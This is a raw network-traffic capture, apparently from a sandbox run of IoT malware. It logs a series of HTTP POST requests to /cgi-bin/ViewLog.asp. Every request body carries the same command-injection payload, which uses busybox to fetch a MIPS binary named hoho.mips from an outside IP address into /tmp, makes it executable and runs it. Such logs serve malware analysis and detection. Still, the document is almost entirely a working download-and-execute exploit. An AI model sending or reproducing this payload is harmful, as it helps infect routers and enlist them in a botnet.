                                              Session IDSource IPSource PortDestination IPDestination Port
                                              362192.168.2.135516294.110.32.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.746814966 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              363192.168.2.135513294.122.107.1448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.805783987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              364192.168.2.134804295.86.85.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.909369946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              365192.168.2.134295831.136.89.548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.371174097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.966401100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.118367910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.550462008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.158382893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.374340057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.318285942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.182199001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              366192.168.2.133547095.140.27.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.385466099 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:00.596551895 CET493INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:16:57 GMT
                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1i
                                              Content-Length: 196
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              367192.168.2.135813831.200.127.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.400062084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              368192.168.2.134211894.122.227.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.627337933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              369192.168.2.135558494.187.101.848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.814336061 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              370192.168.2.133604631.200.63.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.822457075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              371192.168.2.134815095.86.86.58080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:00.859765053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              372192.168.2.133286231.136.209.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:01.573757887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.806361914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.950347900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:22.982327938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.558279037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              373192.168.2.133338031.136.239.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:02.964060068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:03.526376963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.646382093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
